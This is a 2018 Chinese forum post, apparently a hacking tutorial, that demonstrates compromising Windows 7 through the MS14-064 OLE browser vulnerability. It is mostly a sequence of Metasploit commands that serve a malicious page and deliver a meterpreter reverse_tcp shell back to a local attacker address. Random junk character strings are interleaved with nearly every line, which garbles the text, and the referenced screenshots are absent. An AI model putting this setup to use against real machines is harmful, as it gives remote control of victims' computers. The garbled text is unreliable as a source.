找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2155|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. ~5 ~5 I3 q6 w# v9 S 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 - I4 q+ I! W! M7 p0 w; u

- \: F; j5 v" s( W0 k1 u) T- I L

6 ?0 R' |1 L! b/ G/ i, H8 H 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: , i7 p8 L: d5 c, j

2 u& v0 R \6 G7 v% ]3 v

8 G, I! g8 S" Z) p5 ] 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp/ y @# w8 e# M- n9 c3 Z

& d4 U7 X/ Z% V4 ]6 z

( s8 Z3 p8 A U. d             set AllowPowershellPrompt true0 l. z" r; Z$ Z5 N8 q, v2 D0 s4 F

& d' R% E7 A* S

+ U3 V) b; Z/ [* i3 E! E% ~$ ]             Set LHOST 192.168.0.109 7 G+ {4 }7 i1 c$ |3 H* u4 Y) \% G

( R' n- [3 z/ t+ T) p) T6 [! k

4 k5 g: b+ c1 k9 V: K, W0 m             set SRVHOST 192.168.0.109# u+ C7 x" D- r+ L: @* R; ?

/ i3 B6 Z' z. I: V2 ~) ]; ?& q

* @7 N2 H) E( C( j* [( @0 g$ h4 J             Set uripath share ) P% [( R3 r) f9 i7 \+ f# u' r9 }

' x5 I; F+ w) P3 e5 t: D

1 D" o+ @5 Q, j# e             Set srvport 80# L f b. v# A" d2 F6 s, Y) R9 a

$ ^8 ]0 j! ~( }9 M

( ]3 ^% l% v- r; d3 @. H  9 L+ m6 D( w' w% R8 a3 T

5 ^2 {% W- D( O! P& x* x! [; S

/ b6 d1 ]6 t; w+ B, Q! |  5 x( ?) i$ j- X8 |/ f: u

6 p: b& V9 G0 |; Z2 N$ L7 ~

! u' o! _* L8 W% r' e- q H  6 X$ o3 M, }, ?- ]0 e

8 G* p7 U6 n0 `: r" E

* Y/ @- k6 F3 n) Y5 X6 e/ Y: T0 j( b  & `. ~2 G `, ^9 n4 l& D& i* k

4 M: h3 l0 G% N8 X; h7 [

$ Q& }: W( z s8 n" |& c/ e   - U3 D& Z5 w; S5 Y1 p

( e$ p6 C, Y4 h5 I& N' |' @; G

+ }! p* r4 @* u2 w2 [% [7 X. Q 下面我们来访问本地地址如图:3 b/ ]! N2 q6 O$ O

; `+ }2 x* f1 V1 w( E& C

! y6 M9 f; T" w4 [6 ~   4 W. ]( J7 w5 d- {8 N

) b) k7 ?; V0 J* l& K: l7 x

7 O, v' D: X! r% M0 r3 ?0 W  . I# }; d( j1 s; t/ C

9 U, n( }4 L+ J1 K6 r4 Z: q3 C6 @8 r

" }8 }0 O* g1 e( V0 D2 ] " s% s& C; F9 Z6 p% F, S0 z, J

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表